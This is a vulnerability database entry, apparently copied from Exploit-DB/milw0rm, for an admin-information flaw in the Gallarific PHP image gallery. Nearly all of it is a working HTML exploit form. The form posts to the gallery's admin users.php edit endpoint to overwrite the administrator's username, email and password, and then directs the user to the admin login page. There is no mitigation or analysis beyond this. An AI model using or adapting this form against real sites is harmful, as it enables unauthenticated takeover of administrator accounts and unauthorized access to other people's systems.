Gallarific - 'user.php' Arbitrary Change Admin Information

Vulnerability ID 1057839 Vulnerability type
Published 2009-05-26 Updated 2009-05-26
CVE ID N/A CNNVD-ID N/A
Platform PHP CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/8796
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
<titre> gallarific exploit </titre>
 <body bgcolor="#000000">

 <div id="content">
  <h2><font color="#FFFFFF">change password </font></h2>
  <form enctype="multipart/form-data" action="http://www.gallarific.com/demo/gadmin/users.php?task=edit&id=13" method="post" onsubmit="return userFormCheck()">
  <input type="hidden" name="id" value="13">
  <div id="error" class="er" style="display:none"></div>
  <table class="fm" width="408">
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  Founder :</font></td>
  <td class="fc"><input type="text" name="username" id="username" class="if" value="TiGeR-Dz"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5"> Email:</font></td>
  <td class="fc"><input type="text" name="email" id="email" class="if" value="tiger.dz@live.com.com"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font size="5" color="#FFFFFF">Script:</font></td>
  <td class="fc">
  <input type="text" name="password" id="password" class="if" value="gallarific php image gallery software" size="31"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  HOME</font></td>
  <td class="fc">h<font size="4" color="#FFFFFF">http://www.gallarific.com/</font></td>
  </tr>
  </table>
  <p align="center"><input class="su" type="submit" value="Go to change password »"></p>
  <p><font color="#FFFFFF" size="4">Note:after change password go to 
  login in control admin panel :</font></p>
  <p><font size="4" color="#FFFFFF">http://www.gallarific.com/demo/gadmin/index.php</font></p>
  <p align="center"> </p>
  <p align="center"> </p>
  </form>
  </div>
 <div id="help">
   </div>
 <br>
</body>
</html>

# milw0rm.com [2009-05-26]